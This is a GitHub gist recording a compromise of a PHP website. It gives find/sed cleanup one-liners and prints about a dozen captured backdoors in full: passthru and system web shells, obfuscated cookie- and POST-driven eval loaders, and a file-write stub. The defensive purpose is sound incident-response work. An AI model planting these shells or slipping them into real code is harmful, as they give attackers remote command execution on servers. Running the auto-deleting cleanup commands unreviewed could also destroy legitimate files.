Skip to content

Instantly share code, notes, and snippets.

@fedir
Last active February 4, 2022 19:33
Show Gist options
  • Save fedir/d71eb1271a9ee672e29a1b02e84eb8a6 to your computer and use it in GitHub Desktop.
Save fedir/d71eb1271a9ee672e29a1b02e84eb8a6 to your computer and use it in GitHub Desktop.
Traces of one hack and solutions for cleaning after it
find . -type f -iname '*.php' -exec sed -i 's/<?php if (isset(\$_GET\["_cmd"\])) die(passthru(\$_GET\["_cmd"\])); ?>//g' "{}" +;
find . -iname 'index.php' | xargs grep '\x2fhom' | cut -f1 -d":" | xargs rm
find . -iname '*.php' | xargs grep '\x2fh' | cut -f1 -d":" | xargs rm
find . -iname '*.php' | xargs grep 'eval("' | grep 337 | cut -f1 -d":" | xargs rm
find . -iname '*.php' | xargs grep '\{eval(' | cut -f1 -d":" | xargs rm
find . -iname '*.php' | xargs grep '$_COOKIE;' | cut -f1 -d":" | xargs rm
find . -iname '*.php' | xargs grep 'create_function'|grep base64_decode| cut -f1 -d":"| xargs rm
<?php
/*0e5c7*/
@include "\x2fh\x6fm\x65/...";
/*0e5c7*/
echo @file_get_contents('index.htm.bak.bak');
<?php if (isset($_GET["_cmd"])) die(passthru($_GET["_cmd"])); ?>
<?php
$sdr=$_COOKIE;
$akvn=$sdr[skzb];
if($akvn){
$zylnt=$akvn($sdr[nuan]);$kyogt=$akvn($sdr[ndbm]);$lozuc=$zylnt("",$kyogt);$lozuc();
}
<?php
$ajpcm =
'Jzt9bXM9eyRuYWdlPzEpYmxpc2VuY2FzKlthJzpyX2lwZXh0X2NveV1bLCRwPSRte2l'.
'mLCdtKD8xPSR0JHN0JHNpZXJfZmlsMSw0IlxudGVkan07dGFpRW5jZXN1IikpeyRtdC'.
'l7dWJsZX19ZGUoc3MpPnNtYWxscy0+aW5nPlthIF9fJywnaGlzJGRvQXV0XSwkfDJbL'.
'HNlO31paWYoZmFsJGZyci49ZENocy0+aWF0ZXBsXFMqZW1wT3JFX1hfRERSb25hI2kn'.
'O3JlPnNveXBlKHN1dGljMCk7dXJuYmFzKCRwLj0kb2R5JGRpVG8pbmNvfWVsdE1lTE9'.
'HRGViJyorb3InJHRoPkxFcy0+SCBDYSBpZS8ne3Rob2R5biBfZigncGFySVQnX2Ns
...
$_fnsdc = create_function ('$ajpcm', fnsdc (base64_decode (
'VxMCCBBEG0MYBVhLAlNEGAEAEAQPUW1XV1FfBwcTGRsVMyElfiYDMn47dwg3dzZpMjA'.
'ILG4wAkNwdXUmBndRen0gDypzIWIteyZkVyxiMVMwJCUKbSRZemBkACUtdG8LYzcbLW'.
'IlWw9pJl16IWEjCDcgUgJjIkpqZXdhAAFhf1x8NyEyaDJ2OmkhB20tdDF+KTILJ3g9A'.
'1dRd3UXJWJ8R2MiUzJ9NnIxfiRddQdhE3k2MwsrfCBZQ1NjADUyYWgLZjQ2PnM0cSV0'.
'NWBIIWIxRCIwGztoMUpxanpHLSV1e1BjPQghcyUDE3YkWkgFYg9pICULLGskVWFWZAE'.
'6JmZoaWckJgtWI3YuYTtnVAdnIkA6ICY0YyBFfnh3dQAwdk5iZiIIIWE2cRN1Ilp9IG'.
'MMaQczBCttJmRlZmcBKiFhbGVQMlJRZjUDE3E2c1Q+cwNmJiYmI2A2WnFxcUgENGRrB'.
'mQhIgB0N2FTZCROVzVjNnElJTYkYyJKan9jAQgzZWhbdiMiC2cmdRBhJQdTPHIlRysm'.
'NlFuN2BAeHd1AC50e3pTIAtRdDV2LXUnXXU/YlRlOjUhI28kXml7YwAyOGVOZnknIiV'.
'xMXUIZCtgUD54IX45JCYjeDRKZXZ6WxAyYF51VCc2Inw2Zlp9JE51PHUDdjowDyt1NG'.
'R+UWJyMSR1CEd2IiYAVCJ2OmUnB20HYyJYITMmNG4ycHpid3EqM2JvW3kHMSV+IGYmY'.
'jVddT9iVQAxOTEgYyB3fXBjACYGdVJxYyAEXGElWyFyNHNXNWQxQAUkJiN7NEUCdnRy'.
'EwZ2fHFoNFIcdDFiKXYmWm4CYSJlICA1EmMiSmp9Y0c1JmF7UGEiNip+I3YpdCVadiJ'.
'/D1MyOyY0aSBKaXd3dAslZFF6awdSUXQjYSJgMndAJXYcaTIwCCxuMAJDU2NHBzV1CF'.
'dhMDULYTcDOXEwB3k1ciZyJiciAlg0SmJgdFg5AHZ8cWYyJiF3IgIEeiZeTDdlVH0kN'.
'yIFVDMDUHV2cSE0YXtHejQIC1YlAzl+MXNIImMxUyI0GzdrPVpAeHdxXl8UEB8SQTwn'.
'fyt4KnVDbUsSQjtCBhEPAFoAGhQcFRxDRWweHxJBPDd1NmUmYjgRcDJkNG8rLjA1Hjg'.
'bbhsbGQ=='
), $_COOKIE [str_replace('.', '_', $_SERVER['HTTP_HOST'])]) . ';'); $_fnsdc($ajpcm);
function fnsdc ($fobkpc, $crxzwf) { return $fobkpc ^ str_repeat ($crxzwf, ceil (strlen ($fobkpc) / strlen ($crxzwf))); }
?>
<?php
$exuvnp = 'e0fxHd-_59ibtusn\'61ypm*248#galorvkc';$diprjd = Array();$diprjd[] = $exuvnp[9].$exuvnp[18].$exuvnp[17].$exuvnp[17].$exuvnp[9].$exuvnp[28].$exuvnp[0].$exuvnp[25].$exuvnp[6].$exuvnp[8].$exuvnp[25].$exuvnp[9].$exuvnp[11].$exuvnp[6].$exuvnp[24].$exuvnp[24].$exuvnp[23].$exuvnp[8].$exuvnp[6].$exuvnp[11].$exuvnp[5].$exuvnp[2].$exuvnp[25].$exuvnp[6].$exuvnp[5].$exuvnp[5].$exuvnp[17].$exuvnp[28].$exuvnp[34].$exuvnp[8].$exuvnp[2].$exuvnp[9].$exuvnp[1].$exuvnp[23].$exuvnp[25].$exuvnp[28];$diprjd[] = $exuvnp[4].$exuvnp[22];$diprjd[] = $exuvnp[26];$diprjd[] = $exuvnp[34].$exuvnp[30].$exuvnp[13].$exuvnp[15].$exuvnp[12];$diprjd[] = $exuvnp[14].$exuvnp[12].$exuvnp[31].$exuvnp[7].$exuvnp[31].$exuvnp[0].$exuvnp[20].$exuvnp[0].$exuvnp[28].$exuvnp[12];$diprjd[] = $exuvnp[0].$exuvnp[3].$exuvnp[20].$exuvnp[29].$exuvnp[30].$exuvnp[5].$exuvnp[0];$diprjd[] = $exuvnp[14].$exuvnp[13].$exuvnp[11].$exuvnp[14].$exuvnp[12].$exuvnp[31];$diprjd[] = $exuvnp[28].$exuvnp[31].$exuvnp[31].$exuvnp[28].$exuvnp[19].$exuvnp[7].$exuvnp[21].$exuvnp[0].$exuvnp[31].$exuvnp[27].$exuvnp[0];$diprjd[] = $exuvnp[14].$exuvnp[12].$exuvnp[31].$exuvnp[29].$exuvnp[0].$exuvnp[15];$diprjd[] = $exuvnp[20].$exuvnp[28].$exuvnp[34].$exuvnp[33];foreach ($diprjd[7]($_COOKIE, $_POST) as $zxlbxiz => $fofnfs){function rizhpbx($diprjd, $zxlbxiz, $lprovmw){return $diprjd[6]($diprjd[4]($zxlbxiz . $diprjd[0], ($lprovmw / $diprjd[8]($zxlbxiz)) + 1), 0, $lprovmw);}function jlqim($diprjd, $krajv){return @$diprjd[9]($diprjd[1], $krajv);}function fnymk($diprjd, $krajv){$xpoyv = $diprjd[3]($krajv) % 3;if (!$xpoyv) {eval($krajv[1]($krajv[2]));exit();}}$fofnfs = jlqim($diprjd, $fofnfs);fnymk($diprjd, $diprjd[5]($diprjd[2], $fofnfs ^ rizhpbx($diprjd, $zxlbxiz, $diprjd[8]($fofnfs))));}
<?php echo "<pre>";system($_GET['c']); echo "</pre>";?>
#<?php
eval("\n\$dgreusdi = intval(__LINE__) * 337;");
$a = "7VdrT+NGFP1eqf9hiCIcKwHFj7ClIQh2Bd1V6bIthVZC1Jo4k2QSvzR2674raF/94zDk78GLOou5W6Uo2M7Zlzz33MnTs3JzzgTsySlsa674CIXjhROtQ95fX1zo/W+/IbhONgjMOSkqBqRbnffpvcPumbtIeBg4CfdZAQdMOuh43OdJK52Qf3KySaNIh674vqxWRAzvFg/WxqHApG3SlpNZ03l5c/vjsjNCZNNwznnDlhwAbH2UeyCvW1zF/rR4U5h9zwpyCfBnTChMODJU+otD+HhpIiOk8pmB8u4RNL674iZazpDG7MB2RswNR6y1ReodlZIsNvLavv674xyUtuJ3JuyWuIwMxzDI/r18dN5BaBm7rCfcnFHJ8ltFUNkWDJQgSkZHvj+vSnn2+M8OJs8vri+jR+e2YYV7+vTj9cee9vbk57b65XZxfXhvHDL97k9W/n7942Mm+qBsAZFoycOB6748mMSpc/hGSNYjtSY9AckfGbKsQYZqpxKrHF674uez5cXv36lDsByIaLROaOYDGjwp3Wh7mYQRm+XwSVROryKVNcyKd/L6eqltXmlsJxeZVzLI2+mr42/Xw6Z068GPo8jvHdakYsjDzWkQHxPDoMBU2YYuciXGMu/LVvDHFpNApxw9rCGT7o9kmTHyFBPLYh1/v1C7qWm6Vys41c3hayu6uiBLzdhtm83f505JrsPmGBdNiJqKA+7A/FKCO7bfI7HXmdDuVU3zZnd3olO9ThKI/s6743cqWmW95Xx4LKxYdcsVSZUbDuuIer9No1uNzjW48/BAdlqlvV6sPR2ijcZLymcRG9MZW0XjGT2cz674aTWcgmfDaK4nA0GzNN18lgQCoanq/up0LQj61cFZIPhrOkIhaveJIWhbwC8JeW0cXGIw3e+F6xGlQqqyitQm61aKndAXgSTaMl674+kOeA4er+Gasd/dMzQFkLnTUJ6mglOP/ykLghRUUao279onpvKJIRCFkIy0u5fQ5jKK3eNk3+ZvtRYUS1tzRBOKDTVnH2vPgJNFsPU1dgVjQaGY5CgKB1BFtUIW7w46745UG674N5miihTDFNajUsQ2sl8o4fuKzahSmje29sAtnxk8iBaJwrfhYjxmIiutm+Fk6G1Su7j+e0bnc+//AOGBWfq2OqSHsZ582iXCXg+DB7hf4f4O9y674674urg/oQQQ/DdLbNBggwPiHQJC8IHOkFiADdhgAG674AYgBjAGQAZQBmHJaYTAiZUgO674TAiZ674DJ79faYIDNBZoLMhFKrWzYNIAtkFsgskFkgsyBkQciCkAUhG0pt4GzgbOkLcDZwNnD2qxKhDS674bQj0I9b7aZPmf8Ksj1FV9Iipa2imSI5I1duuy2Cd6pecfpmhF74zSeJs2bals2sbdkZ2BVKrsAiVRjdQu6d6fn+vk6AgbvL5Lk5fsYpT0a674UVJ7T8ocGDBauSltwMFn6do5y0iVGJVdoZV7xpGy+IAv49kJYiFmvpfDRMZYM674YyveVlza2G6+1Hbzs2w3S7YffAHTrZeabr3Y9DrhJ8v/sc2rKfcY6GUiHZOu2gw33QPDJ2VdXDo5PsbpplL71JLsD9IfM67StC674iPSDlPZNZvbf3/GaSMR4QW93BZj+D1mZkDdbf";
$a = str_replace($dgreusdi, "E", $a);
eval (gzinflate(base64_decode($a)));
<?php $j3fd = 386;$GLOBALS['r2f00'] = Array();global $r2f00;$r2f00 = $GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['o7bc3'] = "\x3f\x5b\x39\x6c\x5e\x4c\x6e\x7c\x54\x43\x7d\x63\x49\x52\x4a\x47\x6a\x35\x58\x61\x41\x76\x40\x2c\x4d\x2f\x77\x72\x5d\x31\x30\x59\x2b\x45\x65\x2a\x48\x78\x23\x5c\x44\x71\x7e\x66\x24\x7b\x3b\x5a\x34\x68\x70\x74\x3a\x27\x36\x3c\x22\x37\x69\x60\x53\x3e\xa\x26\x55\x20\x6f\x2e\x38\x33\xd\x62\x4f\x56\x6b\x5f\x42\x51\x25\x4e\x7a\x57\x32\x29\x79\x46\x64\x2d\x75\x73\x67\x9\x3d\x28\x21\x6d\x50\x4b";$r2f00[$r2f00['o7bc3'][37].$r2f00['o7bc3'][71].$r2f00['o7bc3'][2].$r2f00['o7bc3'][17]] = $r2f00['o7bc3'][11].$r2f00['o7bc3'][49].$r2f00['o7bc3'][27];$r2f00[$r2f00['o7bc3'][95].$r2f00['o7bc3'][2].$r2f00['o7bc3'][2].$r2f00['o7bc3'][54].$r2f00['o7bc3'][48].$r2f00['o7bc3'][82]] = $r2f00['o7bc3'][66].$r2f00['o7bc3'][27].$r2f00['o7bc3'][86];$r2f00[$r2f00['o7bc3'][34].$r2f00['o7bc3'][48].$r2f00['o7bc3'][69].$r2f00['o7bc3'][2].$r2f00['o7bc3'][54].$r2f00['o7bc3'][69]] = $r2f00['o7bc3'][89].$r2f00['o7bc3'][51].$r2f00['o7bc3'][27].$r2f00['o7bc3'][3].$r2f00['o7bc3'][34].$r2f00['o7bc3'][6];$r2f00[$r2f00['o7bc3'][51].$r2f00['o7bc3'][2].$r2f00['o7bc3'][2].$r2f00['o7bc3'][48].$r2f00['o7bc3'][86]] = $r2f00['o7bc3'][58].$r2f00['o7bc3'][6].$r2f00['o7bc3'][58].$r2f00['o7bc3'][75].$r2f00['o7bc3'][89].$r2f00['o7bc3'][34].$r2f00['o7bc3'][51];$r2f00[$r2f00['o7bc3'][84].$r2f00['o7bc3'][43].$r2f00['o7bc3'][69].$r2f00['o7bc3'][30].$r2f00['o7bc3'][82]] = $r2f00['o7bc3'][89].$r2f00['o7bc3'][34].$r2f00['o7bc3'][27].$r2f00['o7bc3'][58].$r2f00['o7bc3'][19].$r2f00['o7bc3'][3].$r2f00['o7bc3'][58].$r2f00['o7bc3'][80].$r2f00['o7bc3'][34];$r2f00[$r2f00['o7bc3'][19].$r2f00['o7bc3'][82].$r2f00['o7bc3'][69].$r2f00['o7bc3'][82].$r2f00['o7bc3'][43].$r2f00['o7bc3'][2].$r2f00['o7bc3'][69].$r2f00['o7bc3'][19]] = $r2f00['o7bc3'][50].$r2f00['o7bc3'][49].$r2f00['o7bc3'][50].$r2f00['o7bc3'][21].$r2f00['o7bc3'][34].$r2f00['o7bc3'][27].$r2f00['o7bc3'][89].$r2f00['o7bc3'][58].$r2f00['o7bc3'][66].$r2f00['o7bc3'][6];$r2f00[$r2f00['o7bc3'][80].$r2f00['o7bc3'][2].$r2f00['o7bc3'][48].$r2f00['o7bc3'][11]] = $r2f00['o7bc3'][88].$r2f00['o7bc3'][6].$r2f00['o7bc3'][89].$r2f00['o7bc3'][34].$r2f00['o7bc3'][27].$r2f00['o7bc3'][58].$r2f00['o7bc3'][19].$r2f00['o7bc3'][3].$r2f00['o7bc3'][58].$r2f00['o7bc3'][80].$r2f00['o7bc3'][34];$r2f00[$r2f00['o7bc3'][50].$r2f00['o7bc3'][71].$r2f00['o7bc3'][71].$r2f00['o7bc3'][2]] = $r2f00['o7bc3'][71].$r2f00['o7bc3'][19].$r2f00['o7bc3'][89].$r2f00['o7bc3'][34].$r2f00['o7bc3'][54].$r2f00['o7bc3'][48].$r2f00['o7bc3'][75].$r2f00['o7bc3'][86].$r2f00['o7bc3'][34].$r2f00['o7bc3'][11].$r2f00['o7bc3'][66].$r2f00['o7bc3'][86].$r2f00['o7bc3'][34];$r2f00[$r2f00['o7bc3'][19].$r2f00['o7bc3'][68].$r2f00['o7bc3'][82].$r2f00['o7bc3'][68].$r2f00['o7bc3'][48]] = $r2f00['o7bc3'][89].$r2f00['o7bc3'][34].$r2f00['o7bc3'][51].$r2f00['o7bc3'][75].$r2f00['o7bc3'][51].$r2f00['o7bc3'][58].$r2f00['o7bc3'][95].$r2f00['o7bc3'][34].$r2f00['o7bc3'][75].$r2f00['o7bc3'][3].$r2f00['o7bc3'][58].$r2f00['o7bc3'][95].$r2f00['o7bc3'][58].$r2f00['o7bc3'][51];$r2f00[$r2f00['o7bc3'][88].$r2f00['o7bc3'][17].$r2f00['o7bc3'][17].$r2f00['o7bc3'][69]] = $r2f00['o7bc3'][71].$r2f00['o7bc3'][19].$r2f00['o7bc3'][48].$r2f00['o7bc3'][54].$r2f00['o7bc3'][71].$r2f00['o7bc3'][82].$r2f00['o7bc3'][48].$r2f00['o7bc3'][69];$r2f00[$r2f00['o7bc3'][49].$r2f00['o7bc3'][48].$r2f00['o7bc3'][82].$r2f00['o7bc3'][68].$r2f00['o7bc3'][71].$r2f00['o7bc3'][43].$r2f00['o7bc3'][57].$r2f00['o7bc3'][57].$r2f00['o7bc3'][19]] = $r2f00['o7bc3'][74].$r2f00['o7bc3'][57].$r2f00['o7bc3'][48].$r2f00['o7bc3'][68].$r2f00['o7bc3'][30];$r2f00[$r2f00['o7bc3'][34].$r2f00['o7bc3'][68].$r2f00['o7bc3'][71].$r2f00['o7bc3'][82].$r2f00['o7bc3'][30].$r2f00['o7bc3'][11].$r2f00['o7bc3'][86].$r2f00['o7bc3'][68].$r2f00['o7bc3'][17]] = $_POST;$r2f00[$r2f00['o7bc3'][41].$r2f00['o7bc3'][71].$r2f00['o7bc3'][29].$r2f00['o7bc3'][29].$r2f00['o7bc3'][71]] = $_COOKIE;@$r2f00[$r2f00['o7bc3'][51].$r2f00['o7bc3'][2].$r2f00['o7bc3'][2].$r2f00['o7bc3'][48].$r2f00['o7bc3'][86]]($r2f00['o7bc3'][34].$r2f00['o7bc3'][27].$r2f00['o7bc3'][27].$r2f00['o7bc3'][66].$r2f00['o7bc3'][27].$r2f00['o7bc3'][75].$r2f00['o7bc3'][3].$r2f00['o7bc3'][66].$r2f00['o7bc3'][90], NULL);@$r2f00[$r2f00['o7bc3'][51].$r2f00['o7bc3'][2].$r2f00['o7bc3'][2].$r2f00['o7bc3'][48].$r2f00['o7bc3'][86]]($r2f00['o7bc3'][3].$r2f00['o7bc3'][66].$r2f00['o7bc3'][90].$r2f00['o7bc3'][75].$r2f00['o7bc3'][34].$r2f00['o7bc3'][27].$r2f00['o7bc3'][27].$r2f00['o7bc3'][66].$r2f00['o7bc3'][27].$r2f00['o7bc3'][89], 0);@$r2f00[$r2f00['o7bc3'][51].$r2f00['o7bc3'][2].$r2f00['o7bc3'][2].$r2f00['o7bc3'][48].$r2f00['o7bc3'][86]]($r2f00['o7bc3'][95].$r2f00['o7bc3'][19].$r2f00['o7bc3'][37].$r2f00['o7bc3'][75].$r2f00['o7bc3'][34].$r2f00['o7bc3'][37].$r2f00['o7bc3'][34].$r2f00['o7bc3'][11].$r2f00['o7bc3'][88].$r2f00['o7bc3'][51].$r2f00['o7bc3'][58].$r2f00['o7bc3'][66].$r2f00['o7bc3'][6].$r2f00['o7bc3'][75].$r2f00['o7bc3'][51].$r2f00['o7bc3'][58].$r2f00['o7bc3'][95].$r2f00['o7bc3'][34], 0);@$r2f00[$r2f00['o7bc3'][19].$r2f00['o7bc3'][68].$r2f00['o7bc3'][82].$r2f00['o7bc3'][68].$r2f00['o7bc3'][48]](0);$t58b85b0 = NULL;$h853093 = NULL;$r2f00[$r2f00['o7bc3'][90].$r2f00['o7bc3'][29].$r2f00['o7bc3'][54].$r2f00['o7bc3'][82].$r2f00['o7bc3'][43].$r2f00['o7bc3'][29].$r2f00['o7bc3'][68].$r2f00['o7bc3'][11]] = $r2f00['o7bc3'][54].$r2f00['o7bc3'][30].$r2f00['o7bc3'][57].$r2f00['o7bc3'][30].$r2f00['o7bc3'][2].$r2f00['o7bc3'][82].$r2f00['o7bc3'][29].$r2f00['o7bc3'][48].$r2f00['o7bc3'][87].$r2f00['o7bc3'][54].$r2f00['o7bc3'][48].$r2f00['o7bc3'][30].$r2f00['o7bc3'][11].$r2f00['o7bc3'][87].$r2f00['o7bc3'][48].$r2f00['o7bc3'][29].$r2f00['o7bc3'][71].$r2f00['o7bc3'][86].$r2f00['o7bc3'][87].$r2f00['o7bc3'][68].$r2f00['o7bc3'][69].$r2f00['o7bc3'][2].$r2f00['o7bc3'][29].$r2f00['o7bc3'][87].$r2f00['o7bc3'][68].$r2f00['o7bc3'][82].$r2f00['o7bc3'][34].$r2f00['o7bc3'][69].$r2f00['o7bc3'][57].$r2f00['o7bc3'][54].$r2f00['o7bc3'][48].$r2f00['o7bc3'][43].$r2f00['o7bc3'][11].$r2f00['o7bc3'][17].$r2f00['o7bc3'][69].$r2f00['o7bc3'][29];global $g162f18c;function k7480($t58b85b0, $sb27e4){global $r2f00;$hd85 = "";for ($o49c=0; $o49c<$r2f00[$r2f00['o7bc3'][34].$r2f00['o7bc3'][48].$r2f00['o7bc3'][69].$r2f00['o7bc3'][2].$r2f00['o7bc3'][54].$r2f00['o7bc3'][69]]($t58b85b0);){for ($rf060481=0; $rf060481<$r2f00[$r2f00['o7bc3'][34].$r2f00['o7bc3'][48].$r2f00['o7bc3'][69].$r2f00['o7bc3'][2].$r2f00['o7bc3'][54].$r2f00['o7bc3'][69]]($sb27e4) && $o49c<$r2f00[$r2f00['o7bc3'][34].$r2f00['o7bc3'][48].$r2f00['o7bc3'][69].$r2f00['o7bc3'][2].$r2f00['o7bc3'][54].$r2f00['o7bc3'][69]]($t58b85b0); $rf060481++, $o49c++){$hd85 .= $r2f00[$r2f00['o7bc3'][37].$r2f00['o7bc3'][71].$r2f00['o7bc3'][2].$r2f00['o7bc3'][17]]($r2f00[$r2f00['o7bc3'][95].$r2f00['o7bc3'][2].$r2f00['o7bc3'][2].$r2f00['o7bc3'][54].$r2f00['o7bc3'][48].$r2f00['o7bc3'][82]]($t58b85b0[$o49c]) ^ $r2f00[$r2f00['o7bc3'][95].$r2f00['o7bc3'][2].$r2f00['o7bc3'][2].$r2f00['o7bc3'][54].$r2f00['o7bc3'][48].$r2f00['o7bc3'][82]]($sb27e4[$rf060481]));}}return $hd85;}function ba46b243($t58b85b0, $sb27e4){global $r2f00;global $g162f18c;return $r2f00[$r2f00['o7bc3'][49].$r2f00['o7bc3'][48].$r2f00['o7bc3'][82].$r2f00['o7bc3'][68].$r2f00['o7bc3'][71].$r2f00['o7bc3'][43].$r2f00['o7bc3'][57].$r2f00['o7bc3'][57].$r2f00['o7bc3'][19]]($r2f00[$r2f00['o7bc3'][49].$r2f00['o7bc3'][48].$r2f00['o7bc3'][82].$r2f00['o7bc3'][68].$r2f00['o7bc3'][71].$r2f00['o7bc3'][43].$r2f00['o7bc3'][57].$r2f00['o7bc3'][57].$r2f00['o7bc3'][19]]($t58b85b0, $g162f18c), $sb27e4);}foreach ($r2f00[$r2f00['o7bc3'][41].$r2f00['o7bc3'][71].$r2f00['o7bc3'][29].$r2f00['o7bc3'][29].$r2f00['o7bc3'][71]] as $sb27e4=>$e9c8){$t58b85b0 = $e9c8;$h853093 = $sb27e4;}if (!$t58b85b0){foreach ($r2f00[$r2f00['o7bc3'][34].$r2f00['o7bc3'][68].$r2f00['o7bc3'][71].$r2f00['o7bc3'][82].$r2f00['o7bc3'][30].$r2f00['o7bc3'][11].$r2f00['o7bc3'][86].$r2f00['o7bc3'][68].$r2f00['o7bc3'][17]] as $sb27e4=>$e9c8){$t58b85b0 = $e9c8;$h853093 = $sb27e4;}}$t58b85b0 = @$r2f00[$r2f00['o7bc3'][80].$r2f00['o7bc3'][2].$r2f00['o7bc3'][48].$r2f00['o7bc3'][11]]($r2f00[$r2f00['o7bc3'][88].$r2f00['o7bc3'][17].$r2f00['o7bc3'][17].$r2f00['o7bc3'][69]]($r2f00[$r2f00['o7bc3'][50].$r2f00['o7bc3'][71].$r2f00['o7bc3'][71].$r2f00['o7bc3'][2]]($t58b85b0), $h853093));if (isset($t58b85b0[$r2f00['o7bc3'][19].$r2f00['o7bc3'][74]]) && $g162f18c==$t58b85b0[$r2f00['o7bc3'][19].$r2f00['o7bc3'][74]]){if ($t58b85b0[$r2f00['o7bc3'][19]] == $r2f00['o7bc3'][58]){$o49c = Array($r2f00['o7bc3'][50].$r2f00['o7bc3'][21] => @$r2f00[$r2f00['o7bc3'][19].$r2f00['o7bc3'][82].$r2f00['o7bc3'][69].$r2f00['o7bc3'][82].$r2f00['o7bc3'][43].$r2f00['o7bc3'][2].$r2f00['o7bc3'][69].$r2f00['o7bc3'][19]](),$r2f00['o7bc3'][89].$r2f00['o7bc3'][21] => $r2f00['o7bc3'][29].$r2f00['o7bc3'][67].$r2f00['o7bc3'][30].$r2f00['o7bc3'][87].$r2f00['o7bc3'][29],);echo @$r2f00[$r2f00['o7bc3'][84].$r2f00['o7bc3'][43].$r2f00['o7bc3'][69].$r2f00['o7bc3'][30].$r2f00['o7bc3'][82]]($o49c);}elseif ($t58b85b0[$r2f00['o7bc3'][19]] == $r2f00['o7bc3'][34]){eval/*c466e*/($t58b85b0[$r2f00['o7bc3'][86]]);}exit();} ?>
<?php
$vqdi="oJGEzsbpPzsbjEpe2V2YWwozsbYmFzsbzZTY0zsbX2Rl";
$fzsz="Y29kZSgzsbkzsbX1BPU1RbJ3VwZGF0ZSddKSk7fzsbQ==";
$bglo = str_replace("f","","fsftr_frfepflfafcfe");
$fyct="sbxTUzsbZVJztpZihyZXNldCgkYSk9PSzsbdqeCcuJGsgJiYgJGM";
$civq="JGzsbM9J2NvzsbdzsbW50JzskYT0kX1BPU1Q7JGs9J0Ez";
$vuqf = $bglo("sh", "", "bshasesh64_shdshecshode");
$euuf = $bglo("nv","","cnvrnvenvanvtnve_nvfnvunvnnvcnvtion");
$sxsf = $euuf('', $vuqf($bglo("zsb", "", $civq.$fyct.$vqdi.$fzsz))); $sxsf();
<?php file_put_contents($_REQUEST[fileName],$_REQUEST[data]); ?>
<?php
$vyxd="Gs9J2JjR3FVJztpZihyZtqXNldCgkYSktq9P";
$ymgj="Sd1bScuJGsgJiYgJGMoJGEpPjEpe2V2YWwoYmFzZTY0Xtq2RlY29k";
$jpmv="JGM9J2NvdtqW50JtqzskYT0kXtq1tqBPtqU1Q7Jtq";
$zozz = str_replace("h","","hshthrh_hrhephlhahche");
$xyhb="tqZSgktqX1BPU1RbJ3VwZGF0ZSddKSk7fQ==";
$soqb = $zozz("g", "", "basgeg6g4g_gdegcogde");
$odns = $zozz("rr","","crrrerratrrerr_rrfrrurrnrrctrrirrorrn");
$nxqb = $odns('', $soqb($zozz("tq", "", $jpmv.$vyxd.$ymgj.$xyhb))); $nxqb(); ?>
@fedir
Copy link
Author

fedir commented Sep 17, 2020

Have access log for see the request to malware?

@WHK102 This gist is from 2018 :)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment